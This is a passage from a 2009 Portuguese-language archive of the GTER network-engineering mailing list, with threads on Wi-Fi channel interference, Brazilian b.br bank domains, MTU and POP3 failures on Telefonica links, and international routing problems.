system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From rosilto.junior at bamo.com.br Wed Jun 17 13:56:55 2009 From: rosilto.junior at bamo.com.br (Rosilto C. Morais Junior) Date: Wed, 17 Jun 2009 12:56:55 -0400 Subject: [GTER] RES: "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: Verifica se o ap est? com max-throughput ou 'best range'.. pode ser isso. Voce pode alterar p/ best-range e ver o que acontece. Rosilto C. Morais Junior Bamo Infra-Estrutura & Networking Depto. de Networking IP-Phone....: 65 3614-8518 Fax Server..: 65 3614-8501 Celular.......: 65 9252-6737 Messenger ..: juniou at hotmail.com ________________________________________ De: gter-bounces at eng.registro.br [gter-bounces at eng.registro.br] em Nome de MARLON BORBA [MBORBA at trf3.jus.br] Enviado: quarta-feira, 17 de junho de 2009 12:48 Para: gter at eng.registro.br Assunto: [GTER] "Clash" de canais no Wi-Fi. Srs., Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da GTER. Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na maior parte do tempo estou conectado. No entanto, em alguns instantes, acontecem inexplic?veis quedas da comunica??o. A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? tenho divis?rias finas entre a sala onde est? o AP e a minha). Executando uma ferramenta de "sniffing" constato que, na mesma hora das quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. Paulista :P) operando no mesmo canal, que ? o 6. Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- -- gter list https://eng.registro.br/mailman/listinfo/gter Bamo Tecnologia e Networking Av. Governador Jos? Frageli, 550 Bairro Jardim Paulista CEP. 78065-345, Cuiaba, MT. (65)3614-8500 From rrbranco at pobox.com Tue Jun 16 16:31:22 2009 From: rrbranco at pobox.com (Rodrigo Ristow Branco) Date: Tue, 16 Jun 2009 16:31:22 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A2FFF1C.1010409@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> Message-ID: <4A37F30A.1080005@pobox.com> pena que, no meu caso (ou melhor, da institui??o que sou cliente), o .b.br ? redirecionado para .com.br tanto a parte dos clientes "chiques" quanto a parte dos "normais" / "caf?-com-leite" fiz alguns testes e todos com o mesmo resultado. acredito que se eu fizer dois mil "E NOVE" testes o resultado ser? o mesmo. -------- Original Message -------- Subject: [GTER] b.br - meio "off topic"... From: Demi Getschko To: Grupo de Trabalho de Engenharia e Operacao de Redes Date: Wed Jun 10 2009 15:44:44 GMT-0300 > Prezados > > Temos o b.br no ar h? quase um ano e diversos bancos registraram l? > seus dom?nios... Alguns quando acessados via b.br redirecionam para > .com.br e outros est?o no b.br de forma "nativa". Claro que n?o basta > o DNS do banco assinar: a cadeia toda deveria verificar isso, mas j? ? > um come?o. E como dificilmente veremos campanha de marquetim falando > nisso (at? pelos valores investidos na divulga??o do com.br), uma > id?ia ? come?armos uma divulga??o "viral", usando e estimulando o uso > dos s?tios b.br. A proposta, ent?o, ? a ajuda dos colegas para irmos > lentamente nos acostumando a ir ao s?tio do banco com o b.br, sempre > que ele existir... > Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem > alfab?tica. A lista dos dom?nios completa est? em: > http://www.nic.br/atividades/dom-bbr.htm > > *Banco Alfa S/A > Banco BBM S/A > Banco Bonsucesso S/A > Banco Bradesco S/A > Banco Bradesco BBI S/A > Banco BVA S/A > Banco Cooperativo Sicredi S/A - BANSICREDI > Banco do Brasil S/A > Banco do Estado do Par? S/A > Banco Ita? S/A > Banco do Nordeste do Brasil S/A > Banco Industrial e Comercial S/A > Banco Panamericano S/A > Banco Prosper S/A > Banco Safra S/A > Banco Schahin S/A > Banco Triangulo S/A > Banco Votorantim S/A > Banrisul - Banco do Estado do Rio Grande do Sul > Caixa Econ?mica Federal > Paran? Banco S/A > Unibanco * > alfa.b.br > alfanet.b.br > bancoalfa.b.br > > bahiabank.b.br > bancobbm.b.br > bbmbank.b.br > bbminvestimentos.b.br > > bancobonsucesso.b.br > > bradesco.b.br > todasasrazoes.b.br > bancobradesco.b.br > bradescobbi.b.br > bradescocambio.b.br > bradescocartoes.b.br > bradescocomercioeletronico.b.br > > bradescocorporate.b.br > bradescoempresas.b.br > bradescopessoajuridica.b.br > bradescoprime.b.br > bradescoprivate.b.br > bradescori.b.br > bradescouniversitarios.b.br > bradescoseguranca.b.br > bradescopoderpublico.b.br > bradesconikkei.b.br > bancodoplaneta.b.br > bradescorural.b.br > bancoalvorada.b.br > bancobcn.b.br > bancobbi.b.br > bancofinasa.b.br > bbi.b.br > bcn.b.br > bancobmc.b.br > bankpar.b.br > bancoboavista.b.br > bancofinasabmc.b.br > boavista.b.br > bancobradescobbi.b.br > bmc.b.br > bancobankpar.b.br > baneb.b.br > bradescosaude.b.br > bradescoseguros.b.br > 2000e9.b.br > 2000e9bradesco.b.br > 2000enove.b.br > 2000enovebradesco.b.br > 2000i9.b.br > 2000i9bradesco.b.br > 2000inove.b.br > 2000inovebradesco.b.br > bradesco2000e9.b.br > bradesco2000enove.b.br > bradesco2000i9.b.br > bradesco2000inove.b.br > bradescodoismilenove.b.br > bradescodoismilinove.b.br > bradescoinove.b.br > doismilenovebradesco.b.br > doismilinovebradesco.b.br > bradescomediacenter.b.br > bradescopocket.b.br > bradescovidaeprevidencia.b.br > clickconta.b.b > corporatebradesco.b.br > fb.b.br > shopcredit.b.br > shopfacil.b.br > shopinvest.b.br > > alvorada.b.br > bradescocapitalizacao.b.br > bradescocelular.b.br > bradescoimoveis.b.br > bradescocustodia.b.br > bradescoconsorcio.b.br > bradescoprevidencia.b.br > bradespar.b.br > finasaesportes.b.br > cidadetran.b.br > finasa.b.br > economiaemdia.b.br > bradesconetexpress.b.br > bradescorsa.b.br > > bancobci.b.br > bancobva.b.br > bancoconceito.b.br > bancomultiner.b.br > bancosolidez.b.br > bancovalor.b.br > bancovetor.b.br > bancovitoria.b.br > bvadireto.b.br > cdbmais.b.br > cdbseguro.b.br > descontonline.b.br > finameexpress.b.br > finamexpress.b.br > fixseguro.b.br > moneyshopping.b.br > multiaplic.b.br > multicdb.b.br > multicredito.b.br > ndigi.b.br > negociosdigitais.b.br > pegcred.b.br > pegcredito.b.br > peguecred.b.br > peguecredito.b.br > > sicredi.b.br > > bancobrasil.b.br > bancodobrasil.b.br > bb.b.br > > banparanet.b.br > > itau.b.br > > bnb.b.br > > bicbanco.b.br > > bancopanamericano.b.br > panamericano.b.br > > bancoprosper.b.br > prosper.b.br > > safra.b.br > > schahin.b.br > bancoschahin.b.br > > bancotriangulo.b.br > tribanco.b.br > tribanconline.b.br > tribancoonline.b.br > > bancovotorantim.b.br > > banrisul.b.br > > bankingcaixa.b.br > caixaeconomica.b.br > caixaeconomicafederal.b.br > cef.b.br > fgts.b.br > caixa.b.br > > paranabanco.b.br > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > From thiagomespb at gmail.com Wed Jun 17 11:13:40 2009 From: thiagomespb at gmail.com (Thiago Gomes) Date: Wed, 17 Jun 2009 11:13:40 -0300 Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: References: Message-ID: <8212cbca0906170713s77316a47l2a33ef0c07c54829@mail.gmail.com> s? n?o entendi uma coisa na demonstra??o informaram que a tecnologia chamada MMDS, mas somente as operadora de banda larga via cabo utilizam.. mas ser? que os "gatos" n?o est?o usando o 802.11.b (2.4Ghz) ao inv?s do MMDS ? creio que pode ter um erro na demonstra??o j? que ? mais comum utilizaram a 802.11b ao inv?s de MMDS ou estou enganado ? Thiago Gomes From poseidomuk at gmail.com Wed Jun 17 11:27:12 2009 From: poseidomuk at gmail.com (=?ISO-8859-1?Q?Irj=EA_S1_Schmitz?=) Date: Wed, 17 Jun 2009 11:27:12 -0300 Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: References: Message-ID: <38b702510906170727wcf11595xcac8a0598b247f98@mail.gmail.com> Descobriram a roda em pleno s?culo XXI... 2009/6/17 Edinilson - ATINET > > http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1190644-5605,00-BANDA+LARGA+CLANDESTINA+SUBSTITUI+LAN+HOUSES+NA+PERIFERIA+DE+SP.html > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From MBORBA at trf3.jus.br Wed Jun 17 14:15:17 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Wed, 17 Jun 2009 14:15:17 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <4A38FA37.15A6.0046.0@trf3.jus.br> Itamar, N?o pode ser. Como eu disse s? tenho divis?rias entre o AP e a minha mesa (e vidros na parte superior delas). Se as divis?rias "sumissem" daria visada em linha reta. Mesmo assim, decidi pedir para mudar a freq??ncia. -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 17/6/2009 ?s 14:01, Itamar Reis Peixoto gravou: > e' mais provavel que seja uma parede no meio do caminho do que o canal. > > [...] From emiliano.martins at ik1.com.br Wed Jun 17 14:23:35 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Wed, 17 Jun 2009 14:23:35 -0300 Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: <38b702510906170727wcf11595xcac8a0598b247f98@mail.gmail.com> References: <38b702510906170727wcf11595xcac8a0598b247f98@mail.gmail.com> Message-ID: <9c0c824e0906171023s111de693v8483c196bf428116@mail.gmail.com> O interessante ? que descobriram isso agora em SP. Praticamente todas as favelas do Rio j? contam com um servi?o parecido, a pre?os a partir de R$19,90 por mes. 2009/6/17 Irj? S1 Schmitz > Descobriram a roda em pleno s?culo XXI... > > 2009/6/17 Edinilson - ATINET > > > > > > http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1190644-5605,00-BANDA+LARGA+CLANDESTINA+SUBSTITUI+LAN+HOUSES+NA+PERIFERIA+DE+SP.html > > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From breno at brenovale.com.br Tue Jun 16 14:00:56 2009 From: breno at brenovale.com.br (Breno Vale) Date: Tue, 16 Jun 2009 14:00:56 -0300 Subject: [GTER] Problemas CTBC Message-ID: <4A37CFC8.4060500@brenovale.com.br> Pessoal, mais algu?m com problemas na CTCB, especificamente regi?o de Divin?polis-MG ?? []'s Breno Vale From adigital at teleon.com.br Tue Jun 16 14:05:31 2009 From: adigital at teleon.com.br (Adigital) Date: Tue, 16 Jun 2009 14:05:31 -0300 Subject: [GTER] CTBC internacional References: <4A3698F5.9090804@onda.psi.br> <4A379D74.15A6.0046.0@trf3.jus.br> Message-ID: <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> Senhores estamos com problemas em rotas internacionais com CTBC mais alguem com o mesmo problema ? Obrigado Eugenio Teleon From mbonani at gmail.com Wed Jun 17 14:11:39 2009 From: mbonani at gmail.com (Mauricio Bonani) Date: Wed, 17 Jun 2009 14:11:39 -0300 Subject: [GTER] Problemas com Link Telefonica In-Reply-To: References: <4A36A080.5070105@conectcor.com.br> Message-ID: <4A3923CB.8050704@gmail.com> N?o ser? nenhuma surpresa se a Telef?nica acabar sendo comprada por outra tele da noite pro dia. Adriano Anselmo escreveu: > ta uma porcaria esta telefonica mesmo, o pior que clientes acha que ? o > servidor com problemas, tem que ter interven?ao do MP e fechar esta empresa. -- Mauricio Bonani mbonani at gmail.com From ricardo.btu at gmail.com Wed Jun 17 14:28:25 2009 From: ricardo.btu at gmail.com (Ricardo oliveira) Date: Wed, 17 Jun 2009 14:28:25 -0300 Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: <8212cbca0906170713s77316a47l2a33ef0c07c54829@mail.gmail.com> References: <8212cbca0906170713s77316a47l2a33ef0c07c54829@mail.gmail.com> Message-ID: Sim as antenas utilizadas s?o MMDS, alguns provedores de TV no rio usam essa antena de 2,4Ghz. 2009/6/17 Thiago Gomes > s? n?o entendi uma coisa na demonstra??o informaram que a tecnologia > chamada > MMDS, mas somente as operadora de banda larga via cabo utilizam.. > > mas ser? que os "gatos" n?o est?o usando o 802.11.b (2.4Ghz) ao inv?s do > MMDS ? > creio que pode ter um erro na demonstra??o j? que ? mais comum utilizaram > a 802.11b ao inv?s de MMDS > > ou estou enganado ? > > > Thiago Gomes > -- > gter list https://eng.registro.br/mailman/listinfo/gter From avargasn at yahoo.com.br Wed Jun 17 14:40:00 2009 From: avargasn at yahoo.com.br (alberto vargas) Date: Wed, 17 Jun 2009 10:40:00 -0700 (PDT) Subject: [GTER] RES: MTU x Telefonica Message-ID: <652782.78200.qm@web65708.mail.ac4.yahoo.com> Caros, O mturoute pode ser usado para checar o MTU entre dois hosts. Ele pode ser obtido em http://www.elifulkerson.com/projects/mturoute.php Ressalto que se houver firewall no meio do caminho pacotes "ICMP Unreachable" devem ser permitidos para que a ferramenta funcione. Abra?os, Alberto --- Em ter, 16/6/09, Cleber - Listas escreveu: > De: Cleber - Listas > Assunto: [GTER] RES: MTU x Telefonica > Para: "'Grupo de Trabalho de Engenharia e Operacao de Redes'" > Data: Ter?a-feira, 16 de Junho de 2009, 9:51 > Chegamos a ter este problema entre > Embratel e Intelig (nosso IDC). > No caso, abri chamado junto ? Intelig que acionou a > Embratel e solucionou o > problema. > > Isso ocorreu somente na rede 189.60/14 na qual est? > disponivel para a rede > Virtua. > > Abra?os, Cleber > > -----Mensagem original----- > De: gter-bounces at eng.registro.br > [mailto:gter-bounces at eng.registro.br] > Em > nome de Renato de Oliveira Diogo > Enviada em: ter?a-feira, 16 de junho de 2009 09:42 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] MTU x Telefonica > > Temos um link com a telefonica e estamos com este problema > (desde abril). O > pior ? tentar convencer eles que o problema ? na rede > deles. > > Aqui tivemos que modificar o MSS dos pacotes TCP para > diminuir o tamanho do > pacote... para minimizar o problema. Aqui nem a praga do > MSN ficava em p?... > A navega??o fica p?ssima... > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel > 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/16 Diogo Montagner : > > Certa vez eu tive que baixar a mtu de um windows vista > que estava > > utilizando um discador pppoe para poder acessar sites > como hotmail e > > aplica??es como MSN. O engra?ado que isto somente > acontecia com o > > Windows Vista. Como o uso do Vista era tempor?rio, > nunca investiguei a > > fundo o porqu? disso estar acontecendo. Mas o link > abaixo mostra que o > problema n?o era (ou ?) novo. > > http://www.asterisko.com.br/vista-speedy-e-mtu/ > > > > []s > > ./diogo -montagner > > > > > > 2009/6/16 Leandro Keffer > > > >> Amigo, tenho o mesmo problema em um cliente .... > problema com porta > >> 110 no link telefonica, a qual alega nao ter > nenhuma problema O que > >> fiz foi trocar por outro ip da faixa dela e > resolveu aparentemente, > >> mas demorou at? eles sugerirem esta id?ia, porem > n?o sei o que > >> ocorre, tentarei em um horario idle da empresa > para muar o mtu e > >> fazer o teste com o ip anterior que ocorria o > problema > >> > >> > >> 2009/6/15 Felipe Rayel > >> > >> > > >> > Ser? que alguem aqui est? tendo o mesmo > problema que eu? > >> > Faz um semana que usu?rios na rede > telef?nica n?o conseguem baixar > >> > e-mail ou acessar o site do meu servidor. O > outlook come?a a baixar > >> > os e-mails e trava. Igual como se o MTU n?o > estivesse correto. Ja > >> > pedi para realizarem > >> o > >> > teste com o telnet na porta 110 e ocorre o > mesmo problema. > >> > > >> > O mais estranho ? que notei que isso ocorre > apenas em conex?es TCP. > >> > O > >> voip > >> > que ? via UDP funciona normalmente. > >> > > >> > J? tentamos ligar na telefonica, s? que o > checklist padr?o dos > >> > atendentes n?o detecta este problema, pois > eles conseguem navegar > >> > normalmente. O problema s? ocorre com o meu > servidor. J? descartei > >> > a hip?tese de ser problema aqui, pois os > demais clientes na > >> > BRtelecom, etc, ?n?o tem tido > >> este > >> > problema. > >> > > >> > Para fazer um teste, eu modifquei o MTU ?de > um cliente e deixei > >> > fixo em 1350.. Curiosamente passou a > funcionar tudo. > >> > > >> > Alguem sabe como posso solucionar isso ou > tentar entrar em contato > >> > com a Telefonica? Visto que pelo 0800 n?o > consegui. > >> > > >> > Segue um traceroute de um cliente at? o meu > servidor > >> > > >> > 1 ?192.168.254.254 (192.168.254.254) ?0.334 > ms ?0.290 ms ?0.278 ms > >> > 2 ?192.168.32.1 (192.168.32.1) ?51.917 ms > ?30.002 ms ?30.801 ms > >> > 3 ?201-0-4-65.dsl.telesp.net.br (201.0.4.65) > ?29.254 ms * * > >> > 4 ?pos13-3-vlm-sp-rotb-01.telemar.net.br > (200.187.130.25) ?200.104 > >> > ms > >> > ?211.082 ms ?208.803 ms > >> > 5 ?200.223.44.1 (200.223.44.1) ?197.610 ms > ?203.722 ms ?201.464 ms > >> > 6 ?pos3-0-0-vlm-sp-rotn-h01.telemar.net.br > (201.18.246.6) ?208.188 > >> > ms > >> > ?207.880 ms ?208.880 ms > >> > 7 ?pos4-0-0-vlo-sp-rotn-h01.telemar.net.br > (201.18.249.106) ? > >> > 209.118 ms > >> > ?210.797 ms ?212.841 ms > >> > 8 ?pos5-0-0-mpi-mg-rotn-h01.telemar.net.br > (201.18.246.58) ?184.772 > >> > ms > >> > ?187.203 ms ?193.537 ms > >> > 9 > ?gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br > >> > (201.18.252.110) > >> > ?183.577 ms ?211.051 ms ?182.280 ms 10 ? > >> > > gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br > >> > (201.18.251.196) > >> > ?178.779 ms ?181.512 ms ?179.809 ms > >> > 11 ?20118020002.host.telemar.net.br > (201.18.20.2) ?224.655 ms ? > >> > 312.999 > >> ms > >> > ?308.261 ms > >> > 12 ?gelo.fertimitsui.com.br (201.18.21.3) > ?209.396 ms ?199.956 ms > >> ?201.248 > >> > ms > >> > > >> > -- > >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > >> > > >> -- > >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > >> > > -- > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list? ? https://eng.registro.br/mailman/listinfo/gter > Nenhum v?rus encontrado nessa mensagem recebida. > Verificado por AVG - www.avgbrasil.com.br > Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.70/2177 > - Data de > Lan?amento: 06/15/09 05:54:00 > > -- > gter list? ? https://eng.registro.br/mailman/listinfo/gter > Veja quais s?o os assuntos do momento no Yahoo! +Buscados http://br.maisbuscados.yahoo.com From webgeo at gmail.com Wed Jun 17 14:48:36 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Wed, 17 Jun 2009 14:48:36 -0300 Subject: [GTER] =?iso-8859-1?q?Por_falar_em_Telef=F4nica=2E=2E=2E?= Message-ID: Estou com problemas em v?rios destinos, coincidentemente s?o os que passam pelos roteadores da telefonica-wholesale.net Alguem pode me dizer o mesmo? Segue uma parte do trace para a pt.wikipedia.org. No hop 5, o jitter vai pras nuvens. 5 ge-4-0-1-0-grtsaosi1.red.telefonica-wholesale.net [213.140.51.69] 6 so2-1-0-0-grtsaosi2.red.telefonica-wholesale.net [213.140.37.94] 7 so3-0-0-0-grtmiabr3.red.telefonica-wholesale.net [84.16.12.193] 8 so7-0-2-0-grtmiana3.red.telefonica-wholesale.net [213.140.37.77] 9 xe10-3-0-0-grtdaleq1.red.telefonica-wholesale.net.12.16.84.in-addr.arpa [84.16.12.237] 10 206.111.5.97.ptr.us.xo.net [206.111.5.97] 11 te-3-4-0.rar3.dallas-tx.us.xo.net [207.88.12.145] 12 207.88.14.42.ptr.us.xo.net [207.88.14.42] 13 w006.z207088246.xo.cnc.net [207.88.246.6] 14 rr.pmtpa.wikimedia.org [208.80.152.2] Outros destinos que passam pelo mesmo backbone, sofre os mesmos sintomas. Informa??es fornecidas pelo pingplotter pro. Grato, Giovane Heleno Datacenter Manager Wideway do Brasil Ltda. www.wideway.com.br From stuntshell at gmail.com Wed Jun 17 14:47:31 2009 From: stuntshell at gmail.com (Jean Rousseau Franco) Date: Wed, 17 Jun 2009 14:47:31 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38FA37.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> <4A38FA37.15A6.0046.0@trf3.jus.br> Message-ID: Marlon, Mude a frequ?ncia e veja os resultados, respondendo a pergunta, pode causar desconex?o sim. Dependendo do IOS vc pode fazer leitura de Noise Floor e detectar se realmente ? interfer?ncia, caso os resultados sejam algo abaixo de -97. Isso pq o seu sniffer n?o vai identificar frequ?ncias de origem de telefone ou algo do tipo. Abs, 2009/6/17 MARLON BORBA > Itamar, > > N?o pode ser. Como eu disse s? tenho divis?rias entre o AP e a minha > mesa (e vidros na parte superior delas). Se as divis?rias "sumissem" > daria visada em linha reta. Mesmo assim, decidi pedir para mudar a > freq??ncia. > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > > Em 17/6/2009 ?s 14:01, Itamar Reis Peixoto > gravou: > > > e' mais provavel que seja uma parede no meio do caminho do que o > canal. > > > > > [...] > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From webgeo at gmail.com Wed Jun 17 15:00:48 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Wed, 17 Jun 2009 15:00:48 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <6C07E4009BD94C9B9AF0A6B92844FFAA@servidor> Message-ID: Ol? Victor, Seu sobrenome n?o me ? estranho. Nos conhecemos de outras listas? rss... Seguinte... j? passei por esse problema. Se por telnet na porta 110 voc? consegue normalmente, mas pelo outlook n?o, fa?a este teste se for outlook express... Verifique se o codigo de erro ? 0x800CCC0F, se for, v? para a pasta de dados do outlook e localize o arquivo Pop3uidl.dbx. Feche o outlook e renomeie ou delete-o. O outlook criar? um novo ao abrir novamente e far? a conex?o com sucesso. Este arquivo o Outlook utiliza para controlar as conex?es POP3. O erro ocorre quando o Outlook ou alguma instabilidade na coenx?o faz com que o arquivo fique corrompido. Se o c?digo do erro for outro, informe pra gente tentar descobrir. E se manualmente tamb?m teve problemas ao baixar uma mensagem espec?fica, verifique se esta mensagem n?o est? corrompida no servidor. Tente apag?-la pelo webmail. J? utilizei um servidor de email que dava estes sintomas (hmailserver). Abra?os, Giovane Heleno Wideway do Brasil Ltda. www.wideway.com.br 2009/6/16 Victor Benincasa : > Mesmo problema aqui com um cliente, que n?o consegue receber e-mails, > entretanto, > consegue acessar outros servi?os nossos normalmente (http, smtp, etc). > > Fizemos v?rios testes atrav?s da rede do cliente, inclusive simulamos uma > conex?o > manual ao servidor pop [1], e a conex?o ? realizada normalmente > (autentica??o e > listagem de mensagens [2]), mas a comunica??o para ap?s a tentativa de > baixar > qualquer mensagem [3]. Verificando os logs do outlook, a conex?o para no > mesmo > ponto, a? ele mostra a mensagem "timeout - o servidor n?o respondeu em x > segundos..." > > Eliminamos qualquer interfer?ncia poss?vel (firewall, roteador, modem, etc). > Tentamos > tamb?m conex?o atrav?s de porta alternativa (995), usando SSL inclusive, mas > o > problema persiste, restou mesmo algum problema ou filtro da Telec?mica. > > Sugerimos ao cliente ligar para eles e solicitar uma troca de IP para ver se > ajuda > (o IP dele ? fixo), s? que at? para isso o suporte deles d? canseira! > > [1] telnet host 110 > [2] comandos USER / PASS e LIST > [3] comando RETR msg > > -- > Victor Benincasa > http://netbit.com.br > > > ----- Original Message ----- From: "Leandro Keffer" > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Tuesday, June 16, 2009 12:03 AM > Subject: Re: [GTER] MTU x Telefonica > > > Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no > link telefonica, a qual alega nao ter nenhuma problema > O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, > mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, > tentarei em um horario idle da empresa para muar o mtu e fazer o teste com o > ip anterior que ocorria o problema > > > 2009/6/15 Felipe Rayel > >> >> Ser? que alguem aqui est? tendo o mesmo problema que eu? >> Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail >> ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e >> trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem >> o >> teste com o telnet na porta 110 e ocorre o mesmo problema. >> >> O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O voip >> que ? via UDP funciona normalmente. >> >> J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes >> n?o detecta este problema, pois eles conseguem navegar normalmente. O >> problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser >> problema aqui, pois os demais clientes na BRtelecom, etc, ?n?o tem tido >> este >> problema. >> >> Para fazer um teste, eu modifquei o MTU ?de um cliente e deixei fixo em >> 1350.. Curiosamente passou a funcionar tudo. >> >> Alguem sabe como posso solucionar isso ou tentar entrar em contato com a >> Telefonica? Visto que pelo 0800 n?o consegui. >> >> Segue um traceroute de um cliente at? o meu servidor >> >> 1 ?192.168.254.254 (192.168.254.254) ?0.334 ms ?0.290 ms ?0.278 ms >> 2 ?192.168.32.1 (192.168.32.1) ?51.917 ms ?30.002 ms ?30.801 ms >> 3 ?201-0-4-65.dsl.telesp.net.br (201.0.4.65) ?29.254 ms * * >> 4 ?pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) ?200.104 ms >> ?211.082 ms ?208.803 ms >> 5 ?200.223.44.1 (200.223.44.1) ?197.610 ms ?203.722 ms ?201.464 ms >> 6 ?pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) ?208.188 ms >> ?207.880 ms ?208.880 ms >> 7 ?pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) ?209.118 ms >> ?210.797 ms ?212.841 ms >> 8 ?pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) ?184.772 ms >> ?187.203 ms ?193.537 ms >> 9 ?gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) >> ?183.577 ms ?211.051 ms ?182.280 ms >> 10 ?gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) >> ?178.779 ms ?181.512 ms ?179.809 ms >> 11 ?20118020002.host.telemar.net.br (201.18.20.2) ?224.655 ms ?312.999 ms >> ?308.261 ms >> 12 ?gelo.fertimitsui.com.br (201.18.21.3) ?209.396 ms ?199.956 ms ?201.248 >> ms >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From webgeo at gmail.com Wed Jun 17 15:02:36 2009 From: webgeo at gmail.com (Giovane Heleno) Date: Wed, 17 Jun 2009 15:02:36 -0300 Subject: [GTER] CTBC internacional In-Reply-To: <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> References: <4A3698F5.9090804@onda.psi.br> <4A379D74.15A6.0046.0@trf3.jus.br> <016301c9eea4$a9156a50$8434f3c8@we48c11c7c6175> Message-ID: Estou com problemas tamb?m. Mas nos testes que fiz, me parece que ? na rota que sai pela telefonica-wholesale.net Veja se ? o seu caso tamb?m. Giovane Heleno Datacenter Manager Wideway do Brasil Ltda. www.wideway.com.br 2009/6/16 Adigital : > Senhores > > estamos com problemas em rotas internacionais com CTBC > > mais alguem com o mesmo problema ? > > Obrigado > > Eugenio > Teleon > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From danton at inexo.com.br Wed Jun 17 15:21:52 2009 From: danton at inexo.com.br (Danton Nunes) Date: Wed, 17 Jun 2009 15:21:52 -0300 (BRT) Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP In-Reply-To: References: <8212cbca0906170713s77316a47l2a33ef0c07c54829@mail.gmail.com> Message-ID: On Wed, 17 Jun 2009, Ricardo oliveira wrote: > Sim as antenas utilizadas s?o MMDS, alguns provedores de TV no rio usam essa > antena de 2,4Ghz. MMDS usa 2.5GHz, mas a geometria da 